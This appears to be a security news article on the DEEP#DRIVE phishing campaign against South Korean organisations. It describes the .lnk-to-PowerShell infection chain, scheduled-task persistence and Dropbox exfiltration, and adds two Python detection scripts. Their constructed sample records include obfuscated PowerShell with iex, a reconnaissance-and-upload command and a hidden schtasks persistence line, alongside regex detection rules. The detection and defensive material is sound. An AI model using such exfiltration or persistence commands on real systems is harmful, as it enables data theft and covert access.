DEEP#DRIVE: Massive Cyber Espionage Operation
A large-scale cyberattack, known as DEEP#DRIVE, has been launched against South Korean businesses, government agencies, and cryptocurrency users. This phishing attack has already affected thousands of individuals, with hackers using fake documents to trick victims into downloading harmful software. The attack was first detected in September 2024, and its primary goal appears to be stealing sensitive information from South Korean entities.
Cybersecurity researchers investigating this campaign discovered that hackers are sending phishing emails written in Korean, disguised as important documents such as work logs, insurance files, and cryptocurrency-related reports. These emails contain malicious attachments that, when opened, install malware on the victim’s device.
One example of this deception involved a file disguised as a Telegram.exe application. The accompanying document was labeled 대차 및 파레트, Korean for “bogie and pallet”. It contained details such as product name, factory location, and total weight, suggesting that the hackers were targeting businesses in the logistics sector.
To make the attack more convincing, hackers used trusted file formats, such as .hwp (a common Korean document format), .xlsx (Excel spreadsheets), and .pptx (PowerPoint presentations). These files were often stored on popular platforms like Dropbox, which helped the hackers avoid detection by traditional security systems. Researchers have confirmed that phishing was the primary method of infection, as the filenames and document themes closely matched common phishing techniques.
How the DEEP#DRIVE Attack Works
The DEEP#DRIVE campaign follows a multi-stage process designed to infect victims’ systems and extract valuable data. The attack typically begins when a user opens a .lnk file, which appears to be a harmless document but is actually a shortcut that executes malicious PowerShell scripts. These scripts allow hackers to gain control over the system and deploy additional harmful software.
Once the attack begins, the PowerShell script performs several key actions:
- Collecting system details, including the victim’s IP address, operating system version, installed antivirus software, and currently running processes.
- Downloading additional malicious files, disguised as legitimate applications such as Telegram.exe.
- Ensuring the malware remains active on the system, by setting up scheduled tasks like ChromeUpdateTaskMachine to run automatically.
- Exfiltrating stolen data to the hackers’ Dropbox accounts.
One of the primary tools used in this campaign was a script called “system_first.ps1”, which gathered critical system information and sent it to the hackers. Another script, “temp.ps1”, was responsible for deploying the final malicious payload. While researchers were unable to capture the full details of this payload, they suspect it was a backdoor, allowing hackers to gain persistent access to infected devices.
To avoid detection, the hackers used advanced stealth techniques, including:
- Using meaningless variable names to make scripts harder to analyze.
- Adding unnecessary lines of code to create confusion.
- Manipulating strings in a complex way to prevent easy identification by security tools.
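As an added illustration (not code from the report or from the campaign), a small Python heuristic that flags the three obfuscation traits listed above in a PowerShell fragment. Both sample fragments are constructed for this example; the thresholds and regexes are assumptions, not rules from the report.

```python
import re
from collections import Counter

# Constructed sample PowerShell fragments (illustrative, not captured from the campaign):
# a readable admin one-liner and one that shows the three traits listed above.
CLEAN = 'Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name'
OBFUSCATED = (
    '$a1x9 = 2; $q7zp = $a1x9 * 0; $kk = $q7zp; '                  # junk names, dead code
    '$b8w = [char]83+[char]116+[char]97+[char]114+[char]116; '      # "Start" built from char codes
    '$zz = ("htt" + "ps://" + "exam" + "ple.invalid"); '            # split string literal
    'iex ($b8w + "-Sleep 1")'
)

VAR = re.compile(r'\$([A-Za-z_]\w*)')

def obfuscation_traits(script):
    """Return the list of obfuscation traits found; an empty list means nothing suspicious."""
    traits = []
    names = VAR.findall(script)
    # Trait 1: meaningless variable names (short names mixing letters and digits)
    junk = sorted({n for n in names
                   if len(n) <= 5 and re.search(r'[A-Za-z]', n) and re.search(r'\d', n)})
    if junk:
        traits.append(f'meaningless variable names: {junk}')
    # Trait 2: unnecessary code, approximated as variables assigned but never read again
    assigned = set(re.findall(r'\$([A-Za-z_]\w*)\s*=', script))
    uses = Counter(names)
    dead = sorted(n for n in assigned if uses[n] == 1)
    if dead:
        traits.append(f'assigned but never used: {dead}')
    # Trait 3: string manipulation that hides what is finally executed
    if re.search(r'\[char\]\d+\s*\+\s*\[char\]\d+', script):
        traits.append('string assembled from [char] codes')
    if len(re.findall(r'"[^"]{1,6}"\s*\+\s*"', script)) >= 2:
        traits.append('string split into short concatenated literals')
    if re.search(r'\b(iex|Invoke-Expression)\b', script, re.I):
        traits.append('Invoke-Expression on a computed string')
    return traits

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("obfuscated", OBFUSCATED)):
        print(label, obfuscation_traits(sample))
```

Scoring by trait count rather than a single signature is what lets the check survive renamed variables or a different junk-code pattern.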
Additionally, once the attack was completed, the hackers deleted their Dropbox links, making it difficult for investigators to trace their activity. This suggests that the attackers had planned the operation carefully and used a temporary attack infrastructure to evade tracking.
Suspected Hackers and Security Measures
The methods and techniques used in the DEEP#DRIVE attack closely resemble past cyber operations carried out by an Advanced Persistent Threat (APT) group known for targeting South Korea. Cybersecurity researchers believe that the same group is behind this attack due to their use of phishing, PowerShell scripts, and Dropbox for data exfiltration.
To protect against similar attacks, cybersecurity experts recommend several important measures. One of the most critical steps is educating users about phishing tactics. Many cyberattacks succeed because people unknowingly click on malicious links or download infected files. Organizations should train employees to identify suspicious emails, avoid clicking on unverified links, and be cautious when downloading attachments.
Another key defense strategy is monitoring malware staging directories. Many attacks involve storing temporary malicious files on a system before executing them. Security teams should regularly check these directories for unusual or unauthorized files that could indicate an ongoing attack. By identifying threats at an early stage, organizations can prevent malware from spreading further.
Lastly, experts emphasize the importance of using strong endpoint logging systems, such as PowerShell logging. Since PowerShell scripts are commonly used in cyberattacks, logging all PowerShell activity can help security teams detect suspicious commands or unauthorized access attempts. This allows organizations to respond quickly and block malicious activities before they cause significant damage.
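An added example of the kind of check this logging enables, written for this page rather than taken from the report: a Python scan over constructed Event ID 4104 (script block logging) records for the behaviours described above, namely the ChromeUpdateTaskMachine task, the system_first.ps1 and temp.ps1 script names, uploads to Dropbox, and system-information collection. The sample records, the Dropbox hostname pattern and the reconnaissance keyword list are assumptions, not indicators published in the report.

```python
import re

# Constructed sample Event ID 4104 records (not real campaign logs). Only the
# fields the rules need are kept: a record id and the logged ScriptBlockText.
EVENTS = [
    {"id": 1, "text": "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object Length"},
    {"id": 2, "text": ("$ip=(Invoke-RestMethod 'http://ip.example.invalid'); "
                       "$os=(Get-CimInstance Win32_OperatingSystem).Caption; "
                       "$av=Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct; "
                       "$p=Get-Process | Select Name; "
                       "Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload")},
    {"id": 3, "text": ("schtasks /create /sc minute /mo 10 /tn ChromeUpdateTaskMachine "
                       "/tr \"powershell -w hidden -ep bypass -f $env:TEMP\\temp.ps1\"")},
    {"id": 4, "text": "Register-ScheduledTask -TaskName NightlyBackup -Action $a -Trigger $t"},
]

# Signature rules: one regex per behaviour named in the text above.
RULES = {
    "persistence via campaign task name":
        re.compile(r'(schtasks.*/tn\s+|Register-ScheduledTask.*-TaskName\s+)ChromeUpdateTaskMachine', re.I),
    "known staging script name": re.compile(r'\b(system_first|temp)\.ps1\b', re.I),
    "upload to Dropbox": re.compile(r'https?://[\w.-]*dropbox(api|usercontent)?\.com/', re.I),
    "hidden PowerShell with bypassed policy":
        re.compile(r'-w(indowstyle)?\s+hidden.*-e(xecutionpolicy|p)\s+bypass', re.I),
}
# Behavioural rule: the info-gathering listed in the text (IP address, OS version,
# antivirus, running processes); three or more of these in one block is the alert.
RECON = [r'Win32_OperatingSystem', r'AntiVirusProduct', r'Get-Process',
         r'ip(config|\.)|Get-NetIPAddress|IPAddress']

def scan(events):
    """Return sorted (event id, rule name) pairs for every rule an event triggers."""
    hits = []
    for ev in events:
        text = ev["text"]
        for name, rx in RULES.items():
            if rx.search(text):
                hits.append((ev["id"], name))
        if sum(1 for rx in RECON if re.search(rx, text, re.I)) >= 3:
            hits.append((ev["id"], "host reconnaissance bundle"))
    return sorted(hits)

if __name__ == "__main__":
    for event_id, rule in scan(EVENTS):
        print(f"event {event_id}: {rule}")
```

Record 4 shows why the persistence rule keys on the task name rather than on scheduled-task creation itself: a legitimate backup task stays quiet, while the campaign's task name, its staging script and its hidden, policy-bypassing launcher all fire on record 3.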
The DEEP#DRIVE cyberattack highlights the growing risks posed by phishing campaigns and the need for strong cybersecurity measures. With thousands of people already affected, this is one of the most significant cyber threats targeting South Korea in 2024.